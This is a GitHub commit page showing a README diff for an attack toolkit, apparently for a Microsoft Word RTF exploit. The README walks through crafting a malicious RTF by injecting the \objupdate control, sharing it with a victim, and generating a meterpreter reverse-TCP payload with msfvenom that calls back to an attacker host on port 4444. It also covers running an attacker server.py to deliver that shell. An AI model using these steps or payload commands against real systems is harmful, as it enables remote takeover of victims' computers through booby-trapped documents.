Skip to content

Commit

Permalink
Update README.md
Browse files Browse the repository at this point in the history
  • Loading branch information
bhdresh authored Apr 18, 2017
1 parent e3af738 commit 5ce27fa
Showing 1 changed file with 5 additions and 4 deletions.
9 changes: 5 additions & 4 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -7,20 +7,21 @@ https://youtu.be/ymLVH5avkZw
### Steps

##### Step-1) Create a malicious RTF
- Start a webserver on attacker machine
- Open MS Office word and insert an innocent remote doc file (innocent.doc) as an object
- Start a webserver on attacker machine (Kali Linux)
- Upload innocent.doc in public folder
- On windows machine, open MS Office word and insert an innocent remote doc file (innocent.doc) from attacker machine as an object
- Save the file as RTF
- Modify RTF to inject \objupdate control
- Stop the webserver on attacker machine
- Share this RTF file with victim


##### Step-2) Create a meterpreter shell on attacker machine
##### Step-2) Create a meterpreter shell on attacker machine (Kali Linux)
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > shell.exe
- Start multi handler


##### Step-3) Start attacker script (server.py)
##### Step-3) Start attacker script (server.py) on the attacker machine where the innocent.doc was uploaded (Kali Linux)
- Specify URL of meterpreter shell
- Specify location of shell

Expand Down

0 comments on commit 5ce27fa

Please sign in to comment.